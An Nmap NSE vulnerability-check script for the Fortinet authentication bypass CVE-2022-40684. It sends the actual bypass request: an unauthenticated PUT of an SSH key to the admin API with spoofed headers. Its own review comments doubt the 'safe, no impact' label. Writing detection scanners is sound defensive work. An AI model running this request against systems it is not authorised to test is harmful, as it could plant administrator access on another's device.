cve-2022-40684.nse
local io = require "io"
local json = require "json"
local http = require "http"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
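-- NSE script metadata. `description` is shown by nmap's --script-help, so it is
-- user-facing text: the affected-version sentence was missing the separators
-- between the three product lists, which made it read as one product name.
description =
[[
Check Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [Exploit ]
POC for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.
The script sends a specially crafted HTTP request with no impact on the system to detect this vulnerability.
The affected versions are FortiOS versions between 7.0.0 – 7.0.6 and 7.2.0 – 7.2.1, FortiProxy versions between 7.0.0 – 7.0.6 and version 7.2.0, FortiSwitchManager versions 7.0.0 and 7.2.0
]]
---
-- @usage nmap -sV --script vuln <target>
-- @usage nmap -p80 --script cve-2022-40684.nse <target>
---
author = {"Mr_Hackux", "<[email protected]>", "Valentin Lobstein (Balgogan / Chocapikk)", "<[email protected]>"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- NOTE(review): "safe" (and the "no impact" wording in the description) rests on
-- the assumption that the PUT issued by action() is always rejected by the
-- appliance; confirm the key payload can never be persisted before relying on
-- this category.
categories = {"vuln", "safe"}
-- Run on any port that shortport classifies as HTTP.
portrule = shortport.http
-- Response-body markers consulted by action():
--   VULNERABLE  : together with HTTP status 500, marks the host VULN
--   INVALID_KEY : marks the host VULN regardless of status
--   PATCHED     : with a non-500 status, marks the host NOT_VULN
local VULNERABLE = "SSH key is good"
local INVALID_KEY = "SSH key is invalid"
local PATCHED = "Unauthorized"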
--- Script action: issue the probe request against the admin REST endpoint
-- and classify the host from the HTTP response.
-- The three marker checks below are independent and run in order, so the
-- last one that matches decides the final state (a non-500 response whose
-- body contains PATCHED ends NOT_VULN even if INVALID_KEY also matched).
-- NOTE(review): the request is a PUT against the admin object. It is only
-- side-effect free if the appliance rejects the key payload ("SSH key is
-- invalid"); a 500 with "SSH key is good" is also reported VULN, so confirm
-- the payload cannot be persisted. The key material in `json_key` is not
-- recoverable from this listing.
-- @param host Nmap host table (passed through to vulns.Report and http.put)
-- @param port Nmap port table (passed through to vulns.Report and http.put)
-- @return the formatted vulnerability report from vuln_report:make_output
action = function(host, port)
  local ADMIN_URI = "/api/v2/cmdb/system/admin/admin"

  -- SCRIPT_NAME is provided by the NSE runtime.
  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  local finding = {
    title = "Fortinet Critical Authentication Bypass Vulnerability",
    state = vulns.STATE.NOT_VULN, -- default until a marker matches
    description = [[
Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684)
]],
    IDS = {CVE = "CVE-2022-40684"},
    references = {
      "https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/"
    },
    dates = {
      disclosure = {year = "2022", month = "10", day = "16"}
    }
  }

  local json_key =
    '{"ssh-public-key1": "ssh-rsa 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"}'
  local request_opts = {
    header = {
      ["User-Agent"] = "Report Runner",
      ["Forwarded"] = '"for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"',
    },
  }

  local response = http.put(host, port, ADMIN_URI, request_opts, json_key)
  local status, body = response.status, response.body

  -- Only classify when the request actually produced a status and a body.
  if status and body then
    -- Markers are literal strings, so a plain (non-pattern) search suffices.
    local function body_has(marker)
      return string.find(body, marker, 1, true) ~= nil
    end

    if status == 500 and body_has(VULNERABLE) then
      finding.state = vulns.STATE.VULN
    end
    if body_has(INVALID_KEY) then
      finding.state = vulns.STATE.VULN
    end
    if status ~= 500 and body_has(PATCHED) then
      stdnse.debug2("System is patched!")
      finding.state = vulns.STATE.NOT_VULN
    end
  end

  return report:make_output(finding)
end